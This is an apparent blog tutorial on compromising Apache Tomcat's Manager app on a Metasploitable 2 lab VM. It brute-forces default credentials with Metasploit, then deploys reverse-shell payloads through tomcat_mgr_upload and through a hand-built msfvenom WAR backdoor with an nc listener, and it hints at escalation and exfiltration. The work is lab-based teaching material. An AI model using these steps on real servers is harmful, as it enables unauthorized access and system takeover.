CyberMoransđ€
Web management interfacesâ, especially those that have upload functionality, should be carefully examined for vulnerabilitiesâ ïž If a weakness is found in Apache Tomcat, an hacker may be able to use it to upload a backdoor and gain access to the system. It is important to thoroughly check these interfaces to ensure the security of the managed applicationsđ
Apache Tomcat đ„ł is an open-source implementation of several Java technologies, including Java Servlet, JSP, Java EL, and WebSocket đ€ What this does is provide an environment where Java code can run over HTTP. Today, We will hack one! đ
Tomcat uses WAR (Web Application Archive) files to deploy web apps via servlets. These files are similar to JAR files but contain everything the web app needs, such as JavaScript, CSS, etc. Previous versions đ€ of Apache Tomcat included a vulnerability that allowed attackers to upload and deploy a WAR backdoorâ ïž
To demonstrate the vulnerability of Apache Tomcat, we use Kali Linux to perform an attack on an instance of Metasploitable 2, which is a virtual machine that has been intentionally configuredđ§ with security vulnerabilities. The purpose of this exercise is to illustrate the potential risks associated with Tomcat vulnerabilitiesâ ïž
Morans lets do this...â
đ Enumeration
The first stepâïž, obviously, would by performing an Nmap scan on the target to verify that Apache Tomcat is up and running. The -sV switch will attempt to determine the name and version of any available serviceđ
~# nmap -sV 10.10.0.50
Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-06 11:33 CDT
Nmap scan report for 10.10.0.50
Host is up (0.0032s latency)
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet?
25/tcp open smtp?
53/tcp open domain?
80/tcp open tcpwrapped
111/tcp open rpcbind?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds?
512/tcp open exec?
513/tcp open login?
514/tcp open shell?
1099/tcp open rmiregistry?
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs?
2121/tcp open ccproxy-ftp?
3306/tcp open mysql?
5432/tcp open postgresql?
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11?
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:1D:09:55:B1:3B (Dell)
Service Info: Host: irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelsee that Tomcat is indeed running on HTTP port 8180 đ
Next, for this exploit to work, we need a valid set of credentials. Metasploit has an auxiliary scanner that will attempt to đ brute-force Tomcat's Manager application đ
Launch Metasploit with msfconsole in the terminalđ
~# msfconsole
[-] Starting the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v5.0.20-dev ]
+ -- --=[ 2246 exploits - 1265 auxiliary - 430 post ]
+ -- --=[ 840 payloads - 62 encoders - 12 nops ]
+ -- --=[ 3 evasion ]
msf5 >Use the search command to find modules for Apache Tomcatđ
msf5 > search tomcat
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/tomcat_administration normal Yes Tomcat Administration Tool Default Access
1 auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal Yes Tomcat UTF-8 Directory Traversal Vulnerability
2 auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal Yes TrendMicro Data Loss Prevention 5.5 Directory Traversal
3 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS
4 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS
5 auxiliary/dos/http/hashcollision_dos 2011-12-28 normal No Hashtable Collisions
6 auxiliary/scanner/http/tomcat_enum normal Yes Apache Tomcat User Enumeration
7 auxiliary/scanner/http/tomcat_mgr_login normal Yes Tomcat Application Manager Login Utility
8 exploit/linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution
9 exploit/linux/http/cpi_tararchive_upload 2019-05-15 excellent Yes Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
10 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
11 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
12 exploit/multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution
13 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass
14 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution
15 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution
16 exploit/multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Yes Novell ZENworks Configuration Management Arbitrary File Upload
17 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
18 post/multi/gather/tomcat_gather normal No Gather Tomcat Credentials
19 post/windows/gather/enum_tomcat normal No Windows Gather Apache Tomcat EnumerationWe will be using the tomcat_mgr_login module, load it up with the use commandđ
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
or
msf5 > use 7Now we can take a look at the options to see the available settingsđ
msf5 auxiliary(scanner/http/tomcat_mgr_login) > options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
....First, set the rhosts option to the IP address of our targetđ
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.0.50
rhosts => 10.10.0.50And since Tomcat is running on port 8180, set the rport as wellđ
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180Type run to start the attackđ
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 10.10.0.50:8180 - Login Successful: tomcat:tomcat
[-] 10.10.0.50:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedsee it attempt to log in using various combinations of default usernames and passwords. It looks like one login was successful with the username and password both being tomcatđ
if we set STOP_ON_SUCCESS as TRUE....It would have terminated the operation after a successful loginâșïž
đ Get a Shell with Metasploit
Now that we have a valid set of credentials, we can exploit the vulnerability in Tomcat's Manager application. Back in our search results, locate the tomcat_mgr_upload exploit module, and load it with the use commandđ
msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload
or
msf5 auxiliary(scanner/http/tomcat_mgr_login) > use 15
Then, take a look at the current settingsđ
msf5 exploit(multi/http/tomcat_mgr_upload) > options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified username
HttpUsername no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Java UniversalWe will want to set the rhosts optionđ
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.10.0.50
rhosts => 10.10.0.50And the correct rport đ
msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8180
rport => 8180We can also set the username đ
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcatAnd the password đ
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat
HttpPassword => tomcatTo view the available payloads, use the show commandđ
msf5 exploit(multi/http/tomcat_mgr_upload) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom normal No Custom Payload
1 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
4 java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
5 java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager
6 java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager
7 java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager
8 java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager
9 java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager
10 java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager
11 java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline
12 multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
13 multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)The java/shell_reverse_tcp payload will work in this case. Use the set command to set it as the current payload đ
msf5 exploit(multi/http/tomcat_mgr_upload) > set payload java/shell_reverse_tcp
or
msf5 exploit(multi/http/tomcat_mgr_upload) > set payload 11
payload => java/shell_reverse_tcpSince we are using a reverse shell, we specify our local machine's IP addressđ
msf5 exploit(multi/http/tomcat_mgr_upload) > set lhost 10.10.0.1
lhost => 10.10.0.1And any local port đ
msf5 exploit(multi/http/tomcat_mgr_upload) > set lport 4321
lport => 4321We good to go at this point. Simply type run to start the exploit đ
msf5 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 10.10.0.1:4321
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying LUMzvVZI0wSUrt...
[*] Executing LUMzvVZI0wSUrt...
[*] Command shell session 1 opened (10.10.0.1:4321 -> 10.10.0.50:44738) at 2020-01-06 11:59:06 -0500
[*] Undeploying LUMzvVZI0wSUrt ...We see that a session was successfully opened. We now have a basic command shell and can run commands like id and uname -a and others to verify we have compromised the target đ
~# id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linuxđ Backdoor WAR File
Using Metasploit is easy, but it's not the only way to perform this exploit. We can upload a malicious WAR file manually to get a better idea of what's going on under the hood. To begin, we can use msfvenom to create our backdoor WAR file đ
~# msfvenom -p java/shell_reverse_tcp lhost=10.10.0.1 lport=4321 -f war -o hacked.war
Payload size: 13395 bytes
Final size of war file: 13395 bytes
Saved as: hacked.warIn the above command đ ;
đ the -p flag specifies the payload,
đ lhost is the IP address of our local machine,
đ lport is the listening port on our machine,
đ the -f flag specifies the desired format,
đ and the -o flag is the name of the output file.
Next, we need to log into Apache Tomcat. In the browser, go to the IP address of the target on port 8180, and we should see the Apache Tomcat welcome page đ
Next, click on the "Tomcat Manager" link, and we should be presented with an authentication form where we can log in using the default credentials we found earlier đ
Scroll down to the "Deploy" section, and browse to the WAR file we just created with msfvenom đ
Hit the "Deploy" button, and you should be brought back to the top of the page. Now, all we have to do is click on the file we just deployed and our payload will run.
But first, we need to set up a listener on our local machine. Netcat is always a good choice â just ensure to use the same port we specified earlier with msfvenom đ
~# nc -lvnp 4321
listening on [any] 4321 ...Finally, back in the Manager application, locate the name of the file we deployed and click on it đ
You should see a connection open on our Netcat listener đ
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 43521And again, we can issue commands like id and uname -a to verify we have pawned the target, and now have a shell as the tomcat55 user đ
~# id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Wed Dec 14 13:12:00 UTC 2015 i686 GNU/Linux
From this point on, you would be attempting to escalate privileges take over the system as root or data exfiltration.
đConclusion đ€
Subscribe to receive notifications of similar posts đ where we will be reverse engineering malware, vulnerabilities as well as hacking vectors, stories, tutorials and other Infosec stuff...đ
Follow me on twitter for daily Infosec Memes and shenanigansđ
Morans,
Stay safe and dangerousđȘ
Thank you for taking time and hope you learned something new, Like and leave a comment/review and as always, stay awesome! đđ đȘ